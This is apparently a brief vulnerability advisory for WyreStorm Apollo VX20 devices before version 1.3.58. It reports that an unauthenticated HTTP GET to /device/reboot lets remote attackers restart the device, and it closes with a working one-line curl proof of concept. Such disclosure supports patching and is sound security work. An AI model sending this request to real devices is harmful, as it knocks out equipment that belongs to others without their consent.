[+] Credits: John Page (aka hyp3rlinx)    
[+] Website:
[+] Source:
[+] ISR: ApparitionSec     


APOLLO VX20 < 1.3.58

[Vulnerability Type]
Incorrect Access Control (DOS)

[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58

[Affected Component]
Web interface, reboot and reset commands

[CVE Reference]

[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.

curl -k https://192.168.x.x/device/reboot